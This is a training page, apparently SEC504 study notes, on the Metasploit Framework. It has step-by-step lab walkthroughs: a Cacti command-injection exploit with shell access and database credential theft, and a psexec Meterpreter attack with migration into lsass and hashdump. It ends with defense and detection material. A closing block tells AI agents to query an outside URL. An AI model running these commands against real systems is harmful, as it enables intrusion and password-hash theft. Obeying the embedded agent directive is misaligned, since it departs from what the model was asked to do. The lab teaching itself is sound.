# Metasploit Framework H.D. Moore and a team created Metasploit to help build and use exploits. It works best on UNIX systems but can run on Windows with limits. Metasploit connects exploits, payloads, and targets, making it useful for attackers and security testers. It’s open-source, though other tools like Core Impact and Immunity CANVAS are also strong options. Using Metasploit, the attacker picks an exploit and a payload for the target system. They add the target’s IP address, port, and other needed details. Metasploit then builds and sends the attack package, giving the attacker flexibility to launch it. Metasploit has tools for scanning ports and checking if a target has vulnerabilities it can exploit. It also offers evasion options using encoding for exploits and payloads. ## The Metasploit Arsenal Metasploit is a tool with many exploits—small codes that make a victim system run the attacker's code. It supports over a thousand exploits for systems like Windows, macOS, and Linux. Metasploit also has payloads, which are codes attackers want to run on the target, like creating a command shell or controlling the system's GUI remotely. Users don't need to understand how it works—they just pick an exploit and payload, and the tool sends them to the target, where the exploit activates the attacker's code. This makes it easy for beginners to use. Metasploit has auxiliary modules for scanning, DoS, and finding vulnerabilities, while post modules are used after exploiting a system to gather data or escalate privileges. Metasploit includes tools to help developers create new exploits and payloads. These tools find vulnerabilities, locate memory regions for running code, and offer code samples for injecting payloads. They also reduce detection risks. Developers can easily swap payloads and exploits within the framework. ## Metasploit User Interfaces Metasploit offers different interfaces like console, command-line, web, and GUI (Armitage). Attackers pick an exploit to use. Some can check for vulnerabilities before attacking, while others directly run the attack. The attacker sets the target's IP address and port. For payloads needing to talk back to the attacker, like a reverse shell, they add their system's address and port for listening. The attacker then picks a payload, usually a command shell or reverse shell. If no payload is available, they can choose a command to run on the target. Once you set up everything, the attacker can start the exploit. We'll often use the `search` command in Metasploit. Let's dive into a Lightning Labs event to practice this command. 1\) Start by listing the files in your home directory. Run `ls`. ```bash ls ```

2\) The `ls` output reveals a file named INTEL.txt. Display the file contents with `cat`. ```bash cat INTEL.txt ```

3\) Next, start the Metasploit console by running `msfconsole`. ```bash msfconsole ```

4\) Metasploit has integrated help. Run `help` to get context-sensitive help. ```bash help ```

5\) You can also get help for a specific command. Type help search to get help for the search command. ```bash help search ```

The output from `help search` shows several command line arguments, keywords, and examples. 6\) Issue a search to find any Metasploit modules that include the string cacti by running `search cacti`. ```bash search cacti ```

7\) You can also filter the search results by adding a keyword:value pair. For example, you can limit the results to only display modules with a reliability rank of excellent by adding rank:excellent ```bash search cacti rank:excellent ```

8\) You can load the exploit with the use command. Often we'll type use then the long exploit name, but after a search you can enter use N where N is the search result index number. Load the `cacti_unauthenticated_cmd_injection` exploit with `use 0`. ```bash use 0 ```

8\) When you load an exploit, the prompt changes to indicate the exploit name. From here you can run info to get basic information about the exploit. Run the `info` command to see. ```bash info ```

9\) Use the `options` command to see the available exploit options, and the values assigned. ```bash options ```

10\) The RHOSTS option is used to specify one or more systems to target with the exploit by name or IP address. Use the `set` command to set the RHOSTS option to the Cacti server at 10.20.20.38. ```bash set RHOSTS 10.20.20.38 ``` The RPORT option is used to set the port number on the target. Set the RPORT parameter to 80 for the Cacti target. ```bash set RPORT 80 ``` Run the `options` command again to check your work. ```bash options ```

Here we see the RHOSTS and RPORT options are properly configured, but we need to set one more option. 11\) The LHOST option is the attacker IP address. This option is used for any reverse TCP exploit, including the default Meterpreter payload for this exploit. Set the LHOST option to your attacking system at 10.20.20.4. ```bash set LHOST 10.20.20.4 ```

12\) To deliver the exploit you can issue the exploit command. Alternatively, the run command will also work. ```bash exploit ```

13\) From the Meterpreter shell you can manipulate the victim system. Run the `shell` command to get shell access. ```bash shell ```

14\) Cacti installs store passwords in the /var/www/html/include/config.php file. Use `cat` to get the contents of that file. ```bash cat /var/www/html/include/config.php ```

15\) Here we learn the username and password for the database. Use those credentials with the mysql utility to retrieve the password information stored in the Cacti user\_auth table. ```bash mysql -u root -proot -D cacti -e 'select username,password from user_auth' ```

Using the Metasploit console we can search for modules, sort and filter the results, and use an exploit to target a vulnerable system. ## Exploits Currently Included Metasploit Framework Metasploit has over 2,000 exploits and will likely add more as new vulnerabilities are found and code is developed. Exploits target things like browsers, PDF readers, UNIX services (e.g., Apache, SSH), and increasingly mobile devices (Android, iOS). Metasploit exploits commonly take advantage of memory management vulnerabilities such as buffer overflows, heap overflows, and other related attacks. Other exploits gain remote code execution using system backdoors, platform feature manipulation, password reuse attacks, and more. ## Payloads Included in Metasploit Framework Metasploit payloads aim to work on different systems and fix any issues they cause, avoiding crashes or leftover problems. The payloads available within the framework include: * **Bind shell to arbitrary port**: This starts a command shell listener on any TCP port the attacker picks. * **Reverse shell**: This sends a command shell back to the attacker on a TCP port, who will probably be listening with Netcat. * **Windows VNC Server DLL Inject**: This attack lets the hacker control the victim's screen remotely using VNC. The VNC tool is sent as a DLL and runs within the victim's process, so no installation is needed. * **Create Local Admin user**: This payload makes a new admin user with the name and password set by the attacker. Meterpreter is a powerful Metasploit payload for Windows that gives attackers command-line access without creating new processes or touching the hard drive. It runs within the exploited process, operates purely in memory, uses its own commands, and can load new modules to change its functions dynamically. The last two features are the most powerful. Instead of using `hostname.exe`, Meterpreter has a built-in module for system info. Attackers can add more modules to Meterpreter as needed, using the Meterpreter channel to control them. ## Meterpreter Features Here is a set of the features included with the Meterpreter: * Show system info, including the OS type and the user ID of the Meterpreter session. * Manage files and directories: navigate (cd), list files (ls), and upload/download files. * Work with the network to get configuration details and set up TCP port forwarding to bypass firewalls. * Manage processes by starting new programs, stopping processes, or listing those that are currently running. To avoid detection by admins or security systems, Meterpreter encrypts its traffic with TLS on a port selected by the Metasploit user. ## Attack Framework Defense: Preparation Keep systems patched to avoid risks! New exploits can quickly emerge after a vulnerability is found, so it’s crucial to have a strong patching process to act fast. Threat intelligence feeds can give early warnings, but a solid patching routine is key. Also, use Endpoint Detection and Response (EDR) tools to spot and block attacks, adding an extra layer of protection. In 2017, Microsoft improved Windows Defender for Endpoint on Windows 10, originally called Exploit Guard (EG). Now known as exploit protection, it includes extra security features like exploit prevention, system rules, network protection, and controlled access to important folders. For more details, visit [Microsoft's website](https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/exploit-protection). You can use application allow list software to run only approved apps. While it might not stop the exploit itself, it can prevent the payloads from running and quickly alert admins if an attack is blocked early. For Linux systems, use SELinux on important servers (like web or mail servers). Check each distribution’s website for setup instructions (e.g., Debian or RedHat). Also, consider Linux AppArmor for added security, but ensure it's properly configured. More info on AppArmor can be found at its GitLab page. ## Additional Defenses: Preparation Filter all traffic in and out of your network to reduce risk. Use proxies for outbound traffic to control and monitor it. Since networks might already have compromised systems, it’s important to actively search for hidden attackers. Threat hunting involves using methods that bypass regular security to find attackers who might use similar tactics. Conduct threat hunting analysis * Check for long URLs * Check for DNS entries that are on known offender lists * Check for beacon connections * Check for odd services and .exes Finally, there is a great webcast on this topic for RITA at .

## Lab 4.1: Metasploit Attack and Analysis In this lab, we'll attack the Windows VM from the Linux VM. In doing so, we'll expose you to some of the features of Metasploit. You will learn what skillful attackers can do to a victim system. Additionally, you'll see that even advanced attackers will leave traces that skillful defenders can use to track what the adversary is doing. ### Goals of Metasploit Lab This lab has two goals: 1. Explore Metasploit tools and features, including msfconsole, psexec, Meterpreter payload, hashdump, and process migration. 2. Analyze the victim system during an attack, focusing on TCP ports, process activity, and event logs. For this lab, we will use our Slingshot Linux VM to attack your Windows machine. From the Slingshot Linux VM, let's launch `msfconsole`. ```bash msfconsole ```

Next, let's examine the many Metasploit exploits available. ```bash show exploits ```

Metasploit has many exploits. We can use its search feature to find modules with specific keywords. At the msf6 > prompt, let's search for the psexec module by adding `type:exploit` to show only exploits. ```bash search type:exploit psexec ```

Here we see many modules contain the string "psexec." To narrow down results, let's add more keywords. Use the help search command to see available search keywords. ```bash help search ```

We'll use `exploit/windows/smb/psexec`. ```bash info exploit/windows/smb/psexec ```

The output shows configuration options and comments about using the psexec module. This module is very useful in Metasploit because it lets you run code on a target with SYSTEM privileges using SMB and admin credentials. It's especially handy in fully patched Windows systems. Next, let's configure Metasploit to launch the attack. Select the `exploit/windows/smb/psexec` module. ```bash use exploit/windows/smb/psexec ```

Metasploit uses the default payload `windows/meterpreter/reverse_tcp`, which we can check by running `set PAYLOAD`. ```bash set PAYLOAD ```

Let's run `show options` to see all variables for this exploit and payload. ```bash show options ```

In this lab, we'll attack the Windows VM at 10.10.0.1. Let's set the RHOSTS variable to this target. ```bash set RHOSTS 10.10.0.1 ```

The `psexec` module needs admin credentials from the target machine. It uses these to create and run a service with SYSTEM privileges. Set `SMBUser` and `SMBPass` to the admin user's details. ```bash set SMBUSER sec504 set SMBPASS sec504 ```

Note: The SMBPass variable might be set to the user's LANMAN instead of their real password. Metasploit can use this hash to log in with psexec on Windows without needing the actual password. Let's set the LHOST variable to tell the Meterpreter reverse\_tcp payload where to connect back. We want it to connect to the Linux VM. ```bash set LHOST 10.10.75.1 ```

We use the LPORT variable to set a TCP port for connections. We keep it at 4444 to easily spot the connection. A stealthy attacker might use port 443 to hide among HTTPS traffic. Finally, let's review the options again to make sure we've set them all appropriately. ```bash show options ```

With everything set up, we can start the attack to load Meterpreter into the target machine's memory and have it connect back to us. ```bash exploit ```

Look carefully at the status messages from Metasploit. We can see that it authenticates to the target machine and uploads the stager. The stager is the reverse\_tcp part of the payload, which implements communication and the loading of the stage. The stage is Meterpreter itself. Once the stager is active on the target, it sends the Meterpreter stage and connects back to msfconsole, giving us access to the Meterpreter prompt. We now control the target machine with Meterpreter: meterpreter > Once we have the meterpreter prompt, we can manage sessions using msfconsole. First, let's use the `background` command to move the Meterpreter session to the background and return to the msfconsole prompt. ```bash background ``` Metasploit allows us to have multiple sessions with different target machines. To see all open sessions, let's use the `sessions` command. ```bash sessions ```

Each session has a number starting from 1 for the first one Metasploit opens. To go back to a session and interact with it, let's use the `sessions` command and specify the session number (e.g., 1). ```bash session 1 ```

Now let's get information about the host itself. ```bash sysinfo ```

In this output, we can see the host's name (Computer), the operating system type, the CPU architecture, and the language pack installed. To get more info, let's use the built-in `systeminfo` command with Meterpreter: 1. `-i`: Lets us interact with the process to see the command's output. 2. `-f systeminfo`: Specifies the command to run. ```bash execute -if systeminfo ```

We've run the `systeminfo` command on Windows without any extra options to get detailed information about the system, like the OS name, product ID, and install date. Next, let's check the current user ID by running the `getuid` command, like this: ```bash getuid ```

We used the psexec tool with admin credentials to get local SYSTEM access on the target. We can get a list of running processes on the Windows victim using the `ps` command. ```bash ps ```

We can find our Process ID using the `getpid` command, like this. ```bash getpid ```

To access help in Meterpreter, we can use the `help` command or type a question mark. ```bash help ```

When Meterpreter has SYSTEM or admin rights, we can use it to get password hashes from the target. We can dump them from memory with the Meterpreter `hashdump` command. ```bash hashdump ```

When Meterpreter has SYSTEM or admin rights, we can use it to get password hashes from the target. We can dump them from memory with the Meterpreter `hashdump` command. On many Windows versions, this command doesn't work because Microsoft made it harder to get hashes from memory. But with SYSTEM privileges, we can bypass this restriction. There's another way to avoid Windows 10 defenses, but we need to check the migrate feature first. ```bash getpid ps ```

Meterpreter can move to different processes to avoid detection or gain more system privileges. For instance, if a Metasploit attack needs Meterpreter to match the system's CPU architecture, and the current process (like powershell.exe) doesn't match, we can migrate to another process (such as vmtoolsd.exe) with the correct architecture using the migrate command. ```bash migrate -N vmtoolsd.exe ```

Note: Experienced Metasploit users know that the Meterpreter session often fails during the `migrate` command. If `migrate` fails, type `exit` to leave the session. Restart the exploit from the msf6 prompt and try `migrate` again. Sometimes, you might need to try different processes like **VGAuthService.exe**, **openvpnserv.exe**, or **SearchIndexer.exe**. If `migrate` still fails, reboot your Windows VM. Let's run `sysinfo` and `getpid` commands again to check for changes in the new session, noting the new Meterpreter platform (x64/windows) and process ID. ```bash sysinfo getpid ```

The hashdump command didn't work because Windows has stronger protections against extracting password hashes. However, attackers can still try to exploit the LSASS process permissions to get the hashes. The Local Security Authority Subsystem Service (LSASS) is a Windows service that manages security tasks. If `hashdump` fails because of permission issues, we can move into the LSASS process to get around this restriction. Let's migrate to the lsass.exe process. ```bash migrate -N lsass.exe ```

Next, let's run the hashdump command again: ```bash hashdump ```

The Administrator, DefaultAccount, and Guest accounts have empty password hashes because they are disabled. The Sec504 user and WDAGUtilityAccount accounts have non-empty NTLM hashes. If there were several users with passwords, we'd get all the password hashes. But the attacker wouldn't stop there. Next, we'll explore ways to run commands on the Windows system and gain extra access. Let's check the Windows events recorded when using Metasploit's psexec module. On our Windows VM, let's switch to the C:\Tools\hayabusa directory. Next, let's run Hayabusa, specifying the local system logs for analysis. ```bash .\hayabusa csv-timeline -o metasploit-psexec.csv -l ```

Hayabusa finds signs of an attack but wrongly blames Cobalt Strike. This mistake is understandable because the technique used is similar to one used by Cobalt Strike. In PowerShell, we can use the `Import-Csv` command to read a CSV file and create a timeline. Let's filter the results to show only critical and high-risk alerts with the `Where-Object` command and `-CIn` (contains) filter.

```powershell Import-Csv -Path .\metasploit-psexec.csv | Where-Object -Property Level -Cin "crit","high" | Select-Object Timestamp,Level,RuleTitle ```

This lab clarified the features of Metasploit, a crucial tool for both defenders and attackers. It helps them simulate real-world attacks effectively. ## Bonus: Examine DLL Information Let's repeat the lab exercise, examining the DLL changes with the Notepad process before and after the migrate command. First let's start Notepad on windows.

Let's exit the current meterpreter session and exploit the target again. ```bash exit exploit ```

Next, let's create a file with the list of DLLs open for the Notepad process. ```powershell ps -name notepad -Module | select ModuleName > notepad-dll-before.txt ```

Now, let's try to migrate to notepad.exe from our meterpreter session. ```bash migrate -N notepad.exe ```

Let's return to PowerShell again and create a new list of DLLs open for the Notepad process. ```powershell ps -name notepad -Module | select ModuleName > notepad-dll-after.txt ```

Now, let's compare the two files. ```powershell Compare-Object -ReferenceObject (Get-Content -Path .\notepad-dll-before.txt) -DifferenceObject (Get-Content -Path .\notepad-dll-after.txt) ```

Several extra DLLs load into the Notepad process after the Meterpreter migrate command. While these DLLs aren’t harmful, they are unusual for most Windows processes, helping us spot potential signs of an attacker using Meterpreter C2 on our systems. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://faresbltagy.gitbook.io/footprintinglabs/sans-sec504-and-labs/book-four/metasploit-framework.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.